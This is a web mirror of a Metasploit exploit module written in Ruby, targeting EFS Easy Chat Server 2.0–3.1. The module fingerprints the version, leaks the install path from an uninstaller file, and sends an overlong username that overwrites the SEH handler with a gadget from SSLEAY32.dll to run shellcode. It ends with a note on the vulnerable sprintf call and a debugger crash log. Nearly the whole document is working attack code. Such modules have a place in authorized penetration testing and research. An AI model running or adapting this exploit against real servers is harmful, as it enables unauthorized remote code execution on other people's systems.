Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/http/efs_easychatserver_username.rb
19500 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  HttpFingerprint = { :pattern => [ /Easy Chat Server\/1\.0/ ] }

10


11
  include Msf::Exploit::Remote::HttpClient

12
  include Msf::Exploit::Remote::Seh

13


14
  def initialize(info = {})

15
    super(

16
      update_info(

17
        info,

18
        'Name' => 'EFS Easy Chat Server Authentication Request Handling Buffer Overflow',

19
        'Description' => %q{

20
          This module exploits a stack buffer overflow in EFS Software Easy Chat

21
          Server versions 2.0 to 3.1. By sending an overly long authentication

22
          request, an attacker may be able to execute arbitrary code.

23
        },

24
        'Author' => [

25
          'LSO <lso[at]hushmail.com>', # original metasploit

26
          'bcoles' # metasploit

27
        ],

28
        'License' => BSD_LICENSE,

29
        'References' => [

30
          [ 'CVE', '2004-2466' ],

31
          [ 'OSVDB', '7416' ],

32
          [ 'OSVDB', '106841' ],

33
          [ 'BID', '25328' ]

34
        ],

35
        'DefaultOptions' => {

36
          'EXITFUNC' => 'process',

37
        },

38
        'Privileged' => false,

39
        'Payload' => {

40
          'Space' => 7000,

41
          'BadChars' => "\x00\x0a\x0b\x0d\x0f\x20\x25\x26",

42
          'StackAdjustment' => -3500,

43
        },

44
        'Platform' => 'win',

45
        'Targets' => [

46
          # Tested on Easy Chat Server v2.0, 2.1, 2.2, 2.5, 3.1 on:

47
          # -- Windows XP SP 3 (x86) (EN)

48
          # -- Windows 7  SP 1 (x64) (EN)

49
          # -- Windows 8  SP 0 (x64) (EN)

50
          [ 'Automatic Targeting', { 'auto' => true } ],

51
          # p/p/r SSLEAY32.dll

52
          [ 'Easy Chat Server 2.0', { 'Ret' => 0x10010E2E } ],

53
          # p/p/r SSLEAY32.dll

54
          [ 'Easy Chat Server 2.1 - 3.1', { 'Ret' => 0x1001071E } ]

55
        ],

56
        'DisclosureDate' => '2007-08-14',

57
        'DefaultTarget' => 0,

58
        'Notes' => {

59
          'Reliability' => UNKNOWN_RELIABILITY,

60
          'Stability' => UNKNOWN_STABILITY,

61
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

62
        }

63
      )

64
    )

65
  end

66


67
  def check

68
    version = get_version

69
    if not version

70
      return Exploit::CheckCode::Safe

71
    end

72


73
    vprint_status "Found version: #{version}"

74
    if version !~ /^(2\.\d|3\.0|3\.1)$/

75
      return Exploit::CheckCode::Safe

76
    end

77


78
    path = get_install_path

79
    if not path

80
      return Exploit::CheckCode::Detected

81
    end

82


83
    vprint_status "Found path: #{path}"

84
    return Exploit::CheckCode::Appears

85
  end

86


87
  #

88
  # Get software version from change log

89
  #

90
  def get_version

91
    res = send_request_raw 'uri' => '/whatsnew.txt'

92
    if res and res.body =~ /What's new in Easy Chat Server V(\d\.\d)/

93
      return "#{$1}"

94
    end

95
  end

96


97
  #

98
  # Get software installation path from uninstall file

99
  #

100
  def get_install_path

101
    res = send_request_raw 'uri' => '/unins000.dat'

102
    if res and res.body =~ /([A-Z]:\\[^\x00]{2,256})?\\[a-z]+\.htm/i

103
      return "#{$1}"

104
    end

105
  end

106


107
  def exploit

108
    # get target

109
    if target.name =~ /Automatic/

110
      version = get_version

111
      vprint_status "Found version: #{version}" if version

112
      if not version or version !~ /^(2\.\d|3\.0|3\.1)$/

113
        fail_with(Failure::NoTarget, "#{peer} - Unable to automatically detect a target")

114
      elsif version =~ /(2\.0)/

115
        my_target = targets[1]

116
      elsif version =~ /(2\.\d|3\.0|3\.1)/

117
        my_target = targets[2]

118
      end

119
    else

120
      my_target = target

121
    end

122


123
    # get install path

124
    path = get_install_path

125
    if not path

126
      fail_with(Failure::UnexpectedReply, "#{peer} - Could not retrieve install path")

127
    end

128
    path << "\\users\\"

129
    vprint_status "Using path: #{path}"

130


131
    # send payload

132
    sploit = rand_text_alpha(256 - path.length)

133
    sploit << generate_seh_payload(my_target.ret)

134
    print_status "Sending request (#{sploit.length} bytes) to target (#{my_target.name})"

135
    send_request_cgi({

136
      'uri' => '/chat.ghp',

137
      'encode_params' => false,

138
      'vars_get' => {

139
        'username' => sploit,

140
        'password' => rand_text_alphanumeric(rand(10) + 1),

141
        'room' => 1,

142
        'sex' => rand_text_numeric(1)

143
      }

144
    }, 5)

145
  end

146
end

147


148
=begin

149


150
0x004144C8 calls sprintf with the following arguments:

151
sprintf(&FileName, "%susers\\%s", path, username);

152


153
Since we can make the username larger than the allocated buffer size

154
we end up overwriting SEH with a PPR from SSLEAY32.dll and nSEH with

155
a short jmp to the beginning of our shellcode.

156


157
(46c.144): Access violation - code c0000005 (first chance)

158
First chance exceptions are reported before any exception handling.

159
This exception may be expected and handled.

160
eax=ffffffff ebx=000007f6 ecx=0047fd50 edx=41414141 esi=000007ef edi=0047a3ea

161
eip=00445f34 esp=01216b88 ebp=01216ba0 iopl=0         nv up ei pl nz na po nc

162
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202

163
EasyChat+0x45f34:

164
00445f34 8a02            mov     al,byte ptr [edx]          ds:0023:41414141=??

165


166
0:005> !exchain

167
01216dd8: 41414141

168
Invalid exception stack at 41414141

169
=end

170


171